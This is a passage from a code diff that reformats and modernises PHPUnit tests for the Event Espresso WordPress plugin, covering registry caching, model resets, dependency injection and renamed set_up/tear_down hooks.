-		//var_dump( $class_object->Request_Handler() );
-		//echo "\n Module_Request_Router: \n";
-		//var_dump( $class_object->Module_Request_Router() );
-		$this->assertInstanceOf( 'EE_Module_Request_Router', $class_object->Module_Request_Router() );
-	}
+        // let's attempt to load the EE_Front_Controller class file
+        require_once(EE_CORE . 'EE_Front_Controller.core.php');
+        $this->assertEquals(true, class_exists('EE_Front_Controller'));
+        // now attempt instantiation knowing that the EE_Front_Controller class
+        // injects the EE_Module_Request_Router class in the constructor
+        /** @type EE_Front_Controller $class_object */
+        $class_object = EE_Registry_Mock::instance()->create_object('EE_Front_Controller');
+        $this->assertInstanceOf('EE_Front_Controller', $class_object);
+        //echo "\n Request_Handler: \n";
+        //var_dump( $class_object->Request_Handler() );
+        //echo "\n Module_Request_Router: \n";
+        //var_dump( $class_object->Module_Request_Router() );
+        $this->assertInstanceOf('EE_Module_Request_Router', $class_object->Module_Request_Router());
+    }
 
 
-
-	/**
-	 * this tests that objects cached using the EE_Registry class abbreviations can be retrieved
-	 *
-	 * @group                8284
-	 * @author                Brent Christensen
-	 */
-	public function test_set_cached_class_abbreviations() {
-		// create a stdClass object we'll use for a mock
-		$orig_class = new stdClass();
-		$orig_class->name = 'If_This_Is_An_Abbreviated_Class_Name_Then_Why_Is_It_So_Long';
-		// cache it at EE_Registry_Mock::instance()->NET_CFG
-		EE_Registry_Mock::instance()->set_cached_class( $orig_class, 'EE_Network_Config' );
-		// now attempt to retrieve it
-		$cached_class = EE_Registry_Mock::instance()->NET_CFG;
-		$this->assertEquals( $orig_class, $cached_class );
-	}
-
-
-
-	/**
-	 * this tests that objects cached directly as EE_Registry_Mock properties can be retrieved
-	 *
-	 * @group                8284
-	 * @author                Brent Christensen
-	 */
-	public function test_set_cached_class_property() {
-		// create a stdClass object we'll use for a mock
-		$orig_class = new stdClass();
-		$orig_class->name = 'Some_Class';
-		// cache it at EE_Registry_Mock::instance()->CAP
-		EE_Registry_Mock::instance()->set_cached_class( $orig_class, 'Some_Class' );
-		// now attempt to retrieve it
-		$cached_class = EE_Registry_Mock::instance()->Some_Class;
-		$this->assertEquals( $orig_class, $cached_class );
-	}
+    /**
+     * this tests that objects cached using the EE_Registry class abbreviations can be retrieved
+     *
+     * @group                 8284
+     * @author                Brent Christensen
+     */
+    public function test_set_cached_class_abbreviations()
+    {
+        // create a stdClass object we'll use for a mock
+        $orig_class       = new stdClass();
+        $orig_class->name = 'If_This_Is_An_Abbreviated_Class_Name_Then_Why_Is_It_So_Long';
+        // cache it at EE_Registry_Mock::instance()->NET_CFG
+        EE_Registry_Mock::instance()->set_cached_class($orig_class, 'EE_Network_Config');
+        // now attempt to retrieve it
+        $cached_class = EE_Registry_Mock::instance()->NET_CFG;
+        $this->assertEquals($orig_class, $cached_class);
+    }
 
 
-
-	/**
-	 * this tests that objects cached on EE_Registry->LIB can be retrieved
-	 *
-	 * @group                8284
-	 * @author                Brent Christensen
-	 */
-	public function test_set_cached_class_library() {
-		// create a stdClass object we'll use for a mock
-		$orig_class = new stdClass();
-		$orig_class->name = 'Library_Class';
-		// cache it at EE_Registry_Mock::instance()->CAP
-		EE_Registry_Mock::instance()->set_cached_class( $orig_class, 'Library_Class' );
-		// now attempt to retrieve it
-		$cached_class = EE_Registry_Mock::instance()->LIB->Library_Class;
-		$this->assertEquals( $orig_class, $cached_class );
-	}
-
-
-
-	/**
-	 * this tests that objects cached on EE_Registry->addons can be retrieved
-	 *
-	 * @group                8284
-	 * @author                Brent Christensen
-	 */
-	public function test_set_cached_class_addon() {
-		// create a stdClass object we'll use for a mock
-		$orig_class = new stdClass();
-		$orig_class->name = 'Addon_Class';
-		// cache it at EE_Registry_Mock::instance()->CAP
-		EE_Registry_Mock::instance()->set_cached_class( $orig_class, 'Addon_Class', 'addon' );
-		// now attempt to retrieve it
-		$cached_class = EE_Registry_Mock::instance()->addons->Addon_Class;
-		$this->assertEquals( $orig_class, $cached_class );
-	}
+    /**
+     * this tests that objects cached directly as EE_Registry_Mock properties can be retrieved
+     *
+     * @group                 8284
+     * @author                Brent Christensen
+     */
+    public function test_set_cached_class_property()
+    {
+        // create a stdClass object we'll use for a mock
+        $orig_class       = new stdClass();
+        $orig_class->name = 'Some_Class';
+        // cache it at EE_Registry_Mock::instance()->CAP
+        EE_Registry_Mock::instance()->set_cached_class($orig_class, 'Some_Class');
+        // now attempt to retrieve it
+        $cached_class = EE_Registry_Mock::instance()->Some_Class;
+        $this->assertEquals($orig_class, $cached_class);
+    }
 
 
-	/**
-	 * Checks to ensure that when we reset the registry with reset models to true, that the models are actually reset.
-	 * @group 10109
-	 */
-	public function test_reset_with_reset_models() {
-		$testing_model = EE_Registry_Mock::instance()->load_model( 'Event' );
-
-		//put something in the entity map
-		$e = $this->new_model_obj_with_dependencies( 'Event' );
-		$this->assertNotNull( $testing_model->get_from_entity_map( $e->ID() ) );
-
-		//now let's do the full Registry reset including resetting the models.
-		EE_Registry_Mock::instance()->reset( false, true, true );
-
-		//after the reset, the entity map on the model SHOULD be empty.
-		$this->assertNull( EEM_Registration::instance()->get_from_entity_map( $e->ID() ) );
-		$this->assertNull( $testing_model->get_from_entity_map( $e->ID() ) );
-	}
-
+    /**
+     * this tests that objects cached on EE_Registry->LIB can be retrieved
+     *
+     * @group                 8284
+     * @author                Brent Christensen
+     */
+    public function test_set_cached_class_library()
+    {
+        // create a stdClass object we'll use for a mock
+        $orig_class       = new stdClass();
+        $orig_class->name = 'Library_Class';
+        // cache it at EE_Registry_Mock::instance()->CAP
+        EE_Registry_Mock::instance()->set_cached_class($orig_class, 'Library_Class');
+        // now attempt to retrieve it
+        $cached_class = EE_Registry_Mock::instance()->LIB->Library_Class;
+        $this->assertEquals($orig_class, $cached_class);
+    }
 
 
-	/**
-	 * checks model resets happen properly: the model instance should NOT change
-	 * (in case code anywhere has a direct reference to it) but its properties
-	 * should be reset to their original settings
-	 * @group 10107
-	 * @author    Mike Nelson
-	 */
-	public function test_reset_model(){
-		$model_a = EE_Registry_Mock::instance()->load_model('Event');
-		$model_a2 = EE_Registry_Mock::instance()->load_model('Event');
-		$model_a3 = EEM_Event::instance();
-		//and put something in its entity map
-		$e = $this->new_model_obj_with_dependencies( 'Event' );
-		$this->assertNotNull( $model_a->get_from_entity_map( $e->ID() ) );
-		$this->assertEquals($model_a, $model_a2);
-		$this->assertEquals($model_a2, $model_a3);
-		//let's set a differnet WP timezone. When the model is reset, it
-		//should automatically use this new timezone
-		$new_timezone_string = 'America/Detroit';
-		update_option( 'timezone_string', $new_timezone_string );
-		$model_b1 = EEM_Event::reset();
-		$this->assertEquals( $model_a, $model_b1);
-		$model_b2 = EE_Registry_Mock::instance()->reset_model('Event');
-		$this->assertEquals( $model_a, $model_b2);
-		//verify the model now has the new wp timezone
-		$this->assertEquals( $new_timezone_string, $model_b1->get_timezone() );
-		//and that the model's entity map has been reset
-		$this->assertNull( $model_b1->get_from_entity_map( $e->ID() ) );
-	}
+    /**
+     * this tests that objects cached on EE_Registry->addons can be retrieved
+     *
+     * @group                 8284
+     * @author                Brent Christensen
+     */
+    public function test_set_cached_class_addon()
+    {
+        // create a stdClass object we'll use for a mock
+        $orig_class       = new stdClass();
+        $orig_class->name = 'Addon_Class';
+        // cache it at EE_Registry_Mock::instance()->CAP
+        EE_Registry_Mock::instance()->set_cached_class($orig_class, 'Addon_Class', 'addon');
+        // now attempt to retrieve it
+        $cached_class = EE_Registry_Mock::instance()->addons->Addon_Class;
+        $this->assertEquals($orig_class, $cached_class);
+    }
 
 
+    /**
+     * Checks to ensure that when we reset the registry with reset models to true, that the models are actually reset.
+     *
+     * @throws EE_Error
+     * @throws ReflectionException
+     * @group 10109
+     */
+    public function test_reset_with_reset_models()
+    {
+        $testing_model = EE_Registry_Mock::instance()->load_model('Event');
 
-	/**
-	 * test_array_is_numerically_and_sequentially_indexed
-	 *
-	 * @author    Brent Christensen
-	 */
-	public function test_array_is_numerically_and_sequentially_indexed() {
-		// empty arrays should return true
-		$this->assertTrue(
-			EE_Registry_Mock::instance()->array_is_numerically_and_sequentially_indexed( array() )
-		);
-		// should also be fine
-		$this->assertTrue(
-			EE_Registry_Mock::instance()->array_is_numerically_and_sequentially_indexed(
-				array( array() )
-			)
-		);
-		// beauty eh?
-		$this->assertTrue(
-			EE_Registry_Mock::instance()->array_is_numerically_and_sequentially_indexed(
-				array( 'a', 'b', 'c' )
-			)
-		);
-		// numeric "string" keys will get typecast as integers
-		$this->assertTrue(
-			EE_Registry_Mock::instance()->array_is_numerically_and_sequentially_indexed(
-				array( "0" => 'a', "1" => 'b', "2" => 'c' )
-			)
-		);
-		// arrays that are not zero-indexed should return false
-		$this->assertFalse(
-			EE_Registry_Mock::instance()->array_is_numerically_and_sequentially_indexed(
-				array( 1 => 'a', 2 => 'b', 3 => 'c' )
-			)
-		);
-		// out of order
-		$this->assertFalse(
-			EE_Registry_Mock::instance()->array_is_numerically_and_sequentially_indexed(
-				array( "1" => 'a', "0" => 'b', "2" => 'c' )
-			)
-		);
-		// oh come on now!!! Not even close !
-		$this->assertFalse(
-			EE_Registry_Mock::instance()->array_is_numerically_and_sequentially_indexed(
-				array( "a" => 'a', "b" => 'b', "c" => 'c' )
-			)
-		);
-	}
+        //put something in the entity map
+        $e = $this->new_model_obj_with_dependencies('Event');
+        $this->assertNotNull($testing_model->get_from_entity_map($e->ID()));
+
+        //now let's do the full Registry reset including resetting the models.
+        EE_Registry_Mock::instance()->reset(false, true, true);
+
+        //after the reset, the entity map on the model SHOULD be empty.
+        $this->assertNull(EEM_Registration::instance()->get_from_entity_map($e->ID()));
+        $this->assertNull($testing_model->get_from_entity_map($e->ID()));
+    }
 
 
-	/**
-	 * checks that type hinted classes in constructors are properly instantiated and passed
-	 * without negatively affecting other constructor parameters
-	 *
-	 * @author    Brent Christensen
-	 */
-	public function test_dependency_injection() {
-		// either need to set an autoloader for any dependency classes or just pre-load them
-		EE_Registry_Mock::instance()->load_core('EE_Session_Mock');
-		add_filter(
-			'FHEE__EE_Registry__load_service__service_paths',
-			function() {
-				return array(
-					EE_TESTS_DIR . 'mocks/core/services/'
-				);
-			}
-		);
-		// test EE_Injector_Tester_With_Array_Session_Int_Constructor_Params
-		// with NO passed arguments
-		/** @type EE_Injector_Tester_With_Array_Session_Int_Constructor_Params $class */
-		$class = EE_Registry_Mock::instance()->load_service(
-			'EE_Injector_Tester_With_Array_Session_Int_Constructor_Params'
-		);
-		$this->assertEquals( array(), $class->array_property() );
-		$this->assertInstanceOf( 'EE_Session_Mock', $class->session_property() );
-		$this->assertEquals( 0, $class->integer_property() );
-		// reset
-		EE_Registry_Mock::instance()->LIB->EE_Injector_Tester_With_Array_Session_Int_Constructor_Params = null;
-		// test EE_Injector_Tester_With_Array_Session_Int_Constructor_Params
-		// with numerically indexed array passed as argument 1
-		$numerically_indexed_array = array(
-			0 => 'zero',
-			1 => 'one',
-			2 => 'two',
-			3 => 'three',
-		);
-		/** @type EE_Injector_Tester_With_Array_Session_Int_Constructor_Params $class */
-		$class = EE_Registry_Mock::instance()->load_service(
-			'EE_Injector_Tester_With_Array_Session_Int_Constructor_Params',
-			array( $numerically_indexed_array )
-		);
-		$this->assertEquals( $numerically_indexed_array, $class->array_property() );
-		$this->assertInstanceOf( 'EE_Session_Mock', $class->session_property() );
-		$this->assertEquals( 0, $class->integer_property() );
-		// reset
-		EE_Registry_Mock::instance()->LIB->EE_Injector_Tester_With_Array_Session_Int_Constructor_Params = null;
-		// test EE_Injector_Tester_With_Array_Session_Int_Constructor_Params
-		// with string indexed array passed as argument 1
-		// and the integer 2 passed as argument 3
-		$string_indexed_array = array(
-			'zero'  => 0,
-			'one'   => 1,
-			'two'   => 2,
-			'three' => 3,
-		);
-		/** @type EE_Injector_Tester_With_Array_Session_Int_Constructor_Params $class */
-		$class = EE_Registry_Mock::instance()->load_service(
-			'EE_Injector_Tester_With_Array_Session_Int_Constructor_Params',
-			array( $string_indexed_array, null, 2 )
-		);
-		$this->assertEquals( $string_indexed_array, $class->array_property() );
-		$this->assertInstanceOf( 'EE_Session_Mock', $class->session_property() );
-		$this->assertEquals( 2, $class->integer_property() );
-	}
+    /**
+     * checks model resets happen properly: the model instance should NOT change
+     * (in case code anywhere has a direct reference to it) but its properties
+     * should be reset to their original settings
+     *
+     * @throws EE_Error
+     * @throws ReflectionException
+     * @group     10107
+     * @author    Mike Nelson
+     */
+    public function test_reset_model()
+    {
+        $model_a  = EE_Registry_Mock::instance()->load_model('Event');
+        $model_a2 = EE_Registry_Mock::instance()->load_model('Event');
+        $model_a3 = EEM_Event::instance();
+        //and put something in its entity map
+        $e = $this->new_model_obj_with_dependencies('Event');
+        $this->assertNotNull($model_a->get_from_entity_map($e->ID()));
+        $this->assertEquals($model_a, $model_a2);
+        $this->assertEquals($model_a2, $model_a3);
+        //let's set a different WP timezone. When the model is reset, it
+        //should automatically use this new timezone
+        $new_timezone_string = 'America/Detroit';
+        update_option('timezone_string', $new_timezone_string);
+        $model_b1 = EEM_Event::reset();
+        $this->assertEquals($model_a, $model_b1);
+        $model_b2 = EE_Registry_Mock::instance()->reset_model('Event');
+        $this->assertEquals($model_a, $model_b2);
+        //verify the model now has the new wp timezone
+        $this->assertEquals($new_timezone_string, $model_b1->get_timezone());
+        //and that the model's entity map has been reset
+        $this->assertNull($model_b1->get_from_entity_map($e->ID()));
+    }
 
 
-	/**
-	 * This test verifies that if a dependency map entry has more than one type of class listed as dependencies and they
-	 * are both set as `load_new_object`, then they are actually two distinct objects when the parent object
-	 * is instantiated.
-	 *
-	 * For this test we'll use EE_Messages_Generator because it expects two distinct EE_Message_Queue objects sent into its
-	 * constructor via the dependency map.
-	 *
-	 * @group 9325
-	 * @author Darren Ethier
-	 */
-	public function test_multiple_duplicate_class_different_instance_on_construct_using_dependency_map() {
-		//first register our mock in the dependency map
-		$dependencies = array(
-			'EE_Messages_Queue'                    => EE_Dependency_Map::load_new_object,
-			'EE_Messages_Data_Handler_Collection'  => EE_Dependency_Map::load_new_object,
-			'EE_Message_Template_Group_Collection' => EE_Dependency_Map::load_new_object,
-			'EEH_Parse_Shortcodes'                 => EE_Dependency_Map::load_from_cache,
-		);
-		$registered = EE_Dependency_Map::register_dependencies( 'EE_Messages_Generator_Mock', $dependencies );
-		$this->assertTrue( $registered );
-
-		$mock_paths[] = EE_TESTS_DIR . 'mocks/core/libraries/messages';
-
-		//load the mock generator
-		/** @var EE_Messages_Generator_Mock $generator */
-		$generator = EE_Registry_Mock::instance()->load( $mock_paths, 'EE_', 'Messages_Generator_Mock', '' );
-
-		//verify both queues are distinct
-		$this->assertNotEquals(
-			spl_object_hash( $generator->generation_queue() ),
-			spl_object_hash( $generator->ready_queue() )
-		);
-	}
-
-
-
-	/**
-	 * This test verifies that any new dependencies registered
-	 * on EE_Dependency_Map are immediately visible to EE_Registry.
-	 * It may seem wrong because it appears to be testing methods that actually exist on EE_Dependency_Map,
-	 * but they are all methods that are called via the \EE_Registry::$_dependency_map property.
-	 * So this test is just verifying that EE_Registry and EE_Dependency_Map are in sync.
-	 *
-	 * Uses EE_Registry_Mock::dependency_map_has(),
-	 * EE_Registry_Mock::has_dependency_for_class(),
-	 * and EE_Registry_Mock::loading_strategy_for_class_dependency(),
-	 * which all call methods via the EE_Dependency_Map property on EE_Registry
-	 *
-	 * @author Brent Christensen
-	 */
-	public function test_registry_can_see_newly_registered_dependencies() {
-		// first verify that dependency doesn't already exist
-		$this->assertFalse(
-			EE_Registry_Mock::instance()->dependency_map_has( 'Some_New_Class_Name' )
-		);
-		// then register it
-		EE_Dependency_Map::register_dependencies(
-			'Some_New_Class_Name',
-			array( 'DependencyOne' => EE_Dependency_Map::load_new_object )
-		);
-		// and verify that it's now available
-		$this->assertTrue(
-			EE_Registry_Mock::instance()->dependency_map_has( 'Some_New_Class_Name' )
-		);
-		// verify loading strategy
-		$this->assertEquals(
-			EE_Dependency_Map::load_new_object,
-			EE_Registry_Mock::instance()->loading_strategy_for_class_dependency( 'Some_New_Class_Name', 'DependencyOne' )
-		);
-	}
+    /**
+     * test_array_is_numerically_and_sequentially_indexed
+     *
+     * @author    Brent Christensen
+     */
+    public function test_array_is_numerically_and_sequentially_indexed()
+    {
+        // empty arrays should return true
+        $this->assertTrue(
+            EE_Registry_Mock::instance()->array_is_numerically_and_sequentially_indexed([])
+        );
+        // should also be fine
+        $this->assertTrue(
+            EE_Registry_Mock::instance()->array_is_numerically_and_sequentially_indexed(
+                [[]]
+            )
+        );
+        // beauty eh?
+        $this->assertTrue(
+            EE_Registry_Mock::instance()->array_is_numerically_and_sequentially_indexed(
+                ['a', 'b', 'c']
+            )
+        );
+        // numeric "string" keys will get typecast as integers
+        $this->assertTrue(
+            EE_Registry_Mock::instance()->array_is_numerically_and_sequentially_indexed(
+                ["0" => 'a', "1" => 'b', "2" => 'c']
+            )
+        );
+        // arrays that are not zero-indexed should return false
+        $this->assertFalse(
+            EE_Registry_Mock::instance()->array_is_numerically_and_sequentially_indexed(
+                [1 => 'a', 2 => 'b', 3 => 'c']
+            )
+        );
+        // out of order
+        $this->assertFalse(
+            EE_Registry_Mock::instance()->array_is_numerically_and_sequentially_indexed(
+                ["1" => 'a', "0" => 'b', "2" => 'c']
+            )
+        );
+        // oh come on now!!! Not even close !
+        $this->assertFalse(
+            EE_Registry_Mock::instance()->array_is_numerically_and_sequentially_indexed(
+                ["a" => 'a', "b" => 'b', "c" => 'c']
+            )
+        );
+    }
 
 
+    /**
+     * checks that type hinted classes in constructors are properly instantiated and passed
+     * without negatively affecting other constructor parameters
+     *
+     * @throws EE_Error
+     * @throws ReflectionException
+     * @author    Brent Christensen
+     */
+    public function test_dependency_injection()
+    {
+        // either need to set an autoloader for any dependency classes or just pre-load them
+        EE_Registry_Mock::instance()->load_core('EE_Session_Mock');
+        add_filter(
+            'FHEE__EE_Registry__load_service__service_paths',
+            function () {
+                return [
+                    EE_TESTS_DIR . 'mocks/core/services/',
+                ];
+            }
+        );
+        // test EE_Injector_Tester_With_Array_Session_Int_Constructor_Params
+        // with NO passed arguments
+        /** @type EE_Injector_Tester_With_Array_Session_Int_Constructor_Params $class */
+        $class = EE_Registry_Mock::instance()->load_service(
+            'EE_Injector_Tester_With_Array_Session_Int_Constructor_Params'
+        );
+        $this->assertEquals([], $class->array_property());
+        $this->assertInstanceOf('EE_Session_Mock', $class->session_property());
+        $this->assertEquals(0, $class->integer_property());
+        // reset
+        EE_Registry_Mock::instance()->LIB->EE_Injector_Tester_With_Array_Session_Int_Constructor_Params = null;
+        // test EE_Injector_Tester_With_Array_Session_Int_Constructor_Params
+        // with numerically indexed array passed as argument 1
+        $numerically_indexed_array = [
+            0 => 'zero',
+            1 => 'one',
+            2 => 'two',
+            3 => 'three',
+        ];
+        /** @type EE_Injector_Tester_With_Array_Session_Int_Constructor_Params $class */
+        $class = EE_Registry_Mock::instance()->load_service(
+            'EE_Injector_Tester_With_Array_Session_Int_Constructor_Params',
+            [$numerically_indexed_array]
+        );
+        $this->assertEquals($numerically_indexed_array, $class->array_property());
+        $this->assertInstanceOf('EE_Session_Mock', $class->session_property());
+        $this->assertEquals(0, $class->integer_property());
+        // reset
+        EE_Registry_Mock::instance()->LIB->EE_Injector_Tester_With_Array_Session_Int_Constructor_Params = null;
+        // test EE_Injector_Tester_With_Array_Session_Int_Constructor_Params
+        // with string indexed array passed as argument 1
+        // and the integer 2 passed as argument 3
+        $string_indexed_array = [
+            'zero'  => 0,
+            'one'   => 1,
+            'two'   => 2,
+            'three' => 3,
+        ];
+        /** @type EE_Injector_Tester_With_Array_Session_Int_Constructor_Params $class */
+        $class = EE_Registry_Mock::instance()->load_service(
+            'EE_Injector_Tester_With_Array_Session_Int_Constructor_Params',
+            [$string_indexed_array, null, 2]
+        );
+        $this->assertEquals($string_indexed_array, $class->array_property());
+        $this->assertInstanceOf('EE_Session_Mock', $class->session_property());
+        $this->assertEquals(2, $class->integer_property());
+    }
 
-	/**
-	 * This test verifies that any new class loaders registered
-	 * on EE_Dependency_Map are immediately visible to EE_Registry.
-	 * It may seem wrong because it appears to be testing methods that actually exist on EE_Dependency_Map,
-	 * but they are all methods that are called via the \EE_Registry::$_dependency_map property.
-	 * So this test is just verifying that EE_Registry and EE_Dependency_Map are in sync.
-	 *
-	 * Uses EE_Registry_Mock::loading_strategy_for_class_dependency()
-	 * which calls EE_Dependency_Map::loading_strategy_for_class_dependency() via the property on EE_Registry
-	 *
-	 * @author Brent Christensen
-	 */
-	public function test_registry_can_see_newly_registered_class_loaders() {
-		// first verify that class loader doesn't already exist
-		$this->assertEmpty(
-			EE_Registry_Mock::instance()->dependency_map_class_loader( 'DependencyOne' )
-		);
-		// then register it
-		EE_Dependency_Map::register_class_loader( 'DependencyOne', 'load_core' );
-		// and verify that it's now available
-		$this->assertEquals(
-			'load_core',
-			EE_Registry_Mock::instance()->dependency_map_class_loader( 'DependencyOne' )
-		);
-	}
+
+    /**
+     * This test verifies that if a dependency map entry has more than one type of class listed as dependencies and
+     * they
+     * are both set as `load_new_object`, then they are actually two distinct objects when the parent object
+     * is instantiated.
+     *
+     * For this test we'll use EE_Messages_Generator because it expects two distinct EE_Message_Queue objects sent into
+     * its constructor via the dependency map.
+     *
+     * @throws EE_Error
+     * @throws ReflectionException
+     * @group  9325
+     * @author Darren Ethier
+     */
+    public function test_multiple_duplicate_class_different_instance_on_construct_using_dependency_map()
+    {
+        //first register our mock in the dependency map
+        $dependencies = [
+            'EE_Messages_Queue'                    => EE_Dependency_Map::load_new_object,
+            'EE_Messages_Data_Handler_Collection'  => EE_Dependency_Map::load_new_object,
+            'EE_Message_Template_Group_Collection' => EE_Dependency_Map::load_new_object,
+            'EEH_Parse_Shortcodes'                 => EE_Dependency_Map::load_from_cache,
+        ];
+        $registered   = EE_Dependency_Map::register_dependencies('EE_Messages_Generator_Mock', $dependencies);
+        $this->assertTrue($registered);
+
+        $mock_paths[] = EE_TESTS_DIR . 'mocks/core/libraries/messages';
+
+        //load the mock generator
+        /** @var EE_Messages_Generator_Mock $generator */
+        $generator = EE_Registry_Mock::instance()->load($mock_paths, 'EE_', 'Messages_Generator_Mock', '');
+
+        //verify both queues are distinct
+        $this->assertNotEquals(
+            spl_object_hash($generator->generation_queue()),
+            spl_object_hash($generator->ready_queue())
+        );
+    }
+
+
+    /**
+     * This test verifies that any new dependencies registered
+     * on EE_Dependency_Map are immediately visible to EE_Registry.
+     * It may seem wrong because it appears to be testing methods that actually exist on EE_Dependency_Map,
+     * but they are all methods that are called via the \EE_Registry::$_dependency_map property.
+     * So this test is just verifying that EE_Registry and EE_Dependency_Map are in sync.
+     *
+     * Uses EE_Registry_Mock::dependency_map_has(),
+     * EE_Registry_Mock::has_dependency_for_class(),
+     * and EE_Registry_Mock::loading_strategy_for_class_dependency(),
+     * which all call methods via the EE_Dependency_Map property on EE_Registry
+     *
+     * @author Brent Christensen
+     */
+    public function test_registry_can_see_newly_registered_dependencies()
+    {
+        // first verify that dependency doesn't already exist
+        $this->assertFalse(
+            EE_Registry_Mock::instance()->dependency_map_has('Some_New_Class_Name')
+        );
+        // then register it
+        EE_Dependency_Map::register_dependencies(
+            'Some_New_Class_Name',
+            ['DependencyOne' => EE_Dependency_Map::load_new_object]
+        );
+        // and verify that it's now available
+        $this->assertTrue(
+            EE_Registry_Mock::instance()->dependency_map_has('Some_New_Class_Name')
+        );
+        // verify loading strategy
+        $this->assertEquals(
+            EE_Dependency_Map::load_new_object,
+            EE_Registry_Mock::instance()->loading_strategy_for_class_dependency('Some_New_Class_Name', 'DependencyOne')
+        );
+    }
+
+
+    /**
+     * This test verifies that any new class loaders registered
+     * on EE_Dependency_Map are immediately visible to EE_Registry.
+     * It may seem wrong because it appears to be testing methods that actually exist on EE_Dependency_Map,
+     * but they are all methods that are called via the \EE_Registry::$_dependency_map property.
+     * So this test is just verifying that EE_Registry and EE_Dependency_Map are in sync.
+     *
+     * Uses EE_Registry_Mock::loading_strategy_for_class_dependency()
+     * which calls EE_Dependency_Map::loading_strategy_for_class_dependency() via the property on EE_Registry
+     *
+     * @author Brent Christensen
+     */
+    public function test_registry_can_see_newly_registered_class_loaders()
+    {
+        // first verify that class loader doesn't already exist
+        $this->assertEmpty(
+            EE_Registry_Mock::instance()->dependency_map_class_loader('DependencyOne')
+        );
+        // then register it
+        EE_Dependency_Map::register_class_loader('DependencyOne', 'load_core');
+        // and verify that it's now available
+        $this->assertEquals(
+            'load_core',
+            EE_Registry_Mock::instance()->dependency_map_class_loader('DependencyOne')
+        );
+    }
 
 
     /**
      * Corresponds to https://github.com/eventespresso/eventsmart.com-website/issues/36
      * where fetching an add-on that isn't yet registered causes an error
      */
-	public function testGetAddonThatDoesntExist()
+    public function testGetAddonThatDoesntExist()
     {
         EE_Registry_Mock::instance()->getAddon('foobar');
         $this->assertTrue(true);
@@ -774,12 +805,11 @@ class EE_Registry_Test extends EE_UnitTestCase{
      * Corresponds to https://github.com/eventespresso/eventsmart.com-website/issues/36
      * where fetching an add-on that isn't yet registered causes an error
      */
-    public function testremoveAddonThatDoesntExist()
+    public function testRemoveAddonThatDoesntExist()
     {
         EE_Registry_Mock::instance()->removeAddon('foobar');
         $this->assertTrue(true);
     }
-
 }
 // End of file EE_Registry_Test.php
 // Location: /tests/testcases/core/EE_Registry_Test.php

--- a/tests/testcases/core/EE_System_Test.php
+++ b/tests/testcases/core/EE_System_Test.php
@@ -29,8 +29,8 @@ class EE_System_Test extends EE_UnitTestCase{
 	/**
 	 * remember teh espresso_db_update's option before these tests
 	 */
-	function setUp() {
-		parent::setUp();
+	function set_up() {
+		parent::set_up();
 		$this->_original_espresso_db_update = get_option('espresso_db_update');
 		$this->_original_db_state = get_option( EE_Data_Migration_Manager::current_database_state );
 		EE_System::reset();
@@ -371,12 +371,12 @@ class EE_System_Test extends EE_UnitTestCase{
 	/**
 	 * restore the epsresso_db_update option
 	 */
-	function tearDown() {
+	function tear_down() {
 		update_option('espresso_db_update',$this->_original_espresso_db_update);
 		EE_System::reset()->detect_req_type();
 		EE_Data_Migration_Manager::reset();
 		update_option( EE_Data_Migration_Manager::current_database_state, $this->_original_db_state );
-		parent::tearDown();
+		parent::tear_down();
 	}
 }
 

--- a/tests/testcases/core/EE_System_Test_With_Addons.php
+++ b/tests/testcases/core/EE_System_Test_With_Addons.php
@@ -96,9 +96,9 @@ class EE_System_Test_With_Addons extends EE_UnitTestCase
      * @throws DomainException
      * @throws ReflectionException
      */
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->_table_analysis = new TableAnalysis();
         $this->_table_manager  = new TableManager($this->_table_analysis);
         $this->_pretend_addon_hook_time();
@@ -146,7 +146,7 @@ class EE_System_Test_With_Addons extends EE_UnitTestCase
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
         //if somehow $this->_addon isn't set, we don't need to worry about deregistering it right?
         if ($this->_addon instanceof EE_Addon) {
@@ -173,7 +173,7 @@ class EE_System_Test_With_Addons extends EE_UnitTestCase
             // because each subsequent test expects them to be gone
             $this->_table_manager->dropTables($this->_temp_tables_added_by_addon);
         }
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/core/Psr4AutoloaderTest.php
+++ b/tests/testcases/core/Psr4AutoloaderTest.php
@@ -12,8 +12,8 @@ class Psr4AutoloaderTest extends \EE_UnitTestCase {
 
 
 
-	public function setUp() {
-		parent::setUp();
+	public function set_up() {
+		parent::set_up();
 		require_once( EE_TESTS_DIR . 'mocks/core/Psr4AutoloaderMock.php' );
 		$this->loader = new Psr4AutoloaderMock;
 		$this->loader->setFiles( array(

--- a/tests/testcases/core/admin/EE_Admin_Hooks_Tests.php
+++ b/tests/testcases/core/admin/EE_Admin_Hooks_Tests.php
@@ -31,9 +31,9 @@ class EE_Admin_Hooks_Tests extends EE_UnitTestCase
     /**
      * used to set the admin page mock
      */
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->loadAdminMocks();
         $this->_eeAdminMock = new Admin_Mock_Valid_Admin_Page(false);
         $this->_eeAdminMock->initializePage();

--- a/tests/testcases/core/admin/EE_Admin_Tests.php
+++ b/tests/testcases/core/admin/EE_Admin_Tests.php
@@ -24,9 +24,9 @@ class EE_Admin_Tests extends EE_UnitTestCase {
     public $admin;
 
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->loader->getShared('EE_Admin');
         $this->setupRequest();
         $this->admin = EE_Admin::reset();

--- a/tests/testcases/core/admin/EE_Admin_Tests.php
+++ b/tests/testcases/core/admin/EE_Admin_Tests.php
@@ -232,7 +232,7 @@ class EE_Admin_Tests extends EE_UnitTestCase {
 
 		$generated_items = EE_Admin::instance()->dashboard_glance_items( array() );
 		//first assert the elements are an array.
-		$this->assertInternalType('array', $generated_items);
+		$this->assertIsArray($generated_items);
 
 		//assert the count for the array is two
 		$this->assertCount(
@@ -288,9 +288,9 @@ class EE_Admin_Tests extends EE_UnitTestCase {
         set_current_screen('user-new');
 		$actual = EE_Admin::instance()->espresso_admin_footer();
 		//assert contains powered by text.
-		$this->assertContains('Online event registration and ticketing powered by ', $actual);
+		$this->assertStringContainsString('Online event registration and ticketing powered by ', $actual);
 		//assert contains eventespresso.com link
-		$this->assertContains('https://eventespresso.com/', $actual);
+		$this->assertStringContainsString('https://eventespresso.com/', $actual);
 		global $current_screen;
 		$current_screen = null;
 	}

--- a/tests/testcases/core/db_classes/EE_Base_Class_Test.php
+++ b/tests/testcases/core/db_classes/EE_Base_Class_Test.php
@@ -20,9 +20,9 @@ class EE_Base_Class_Test extends EE_UnitTestCase
     /**
      * @throws EE_Error
      */
-    public function setUp()
+    public function set_up()
     {
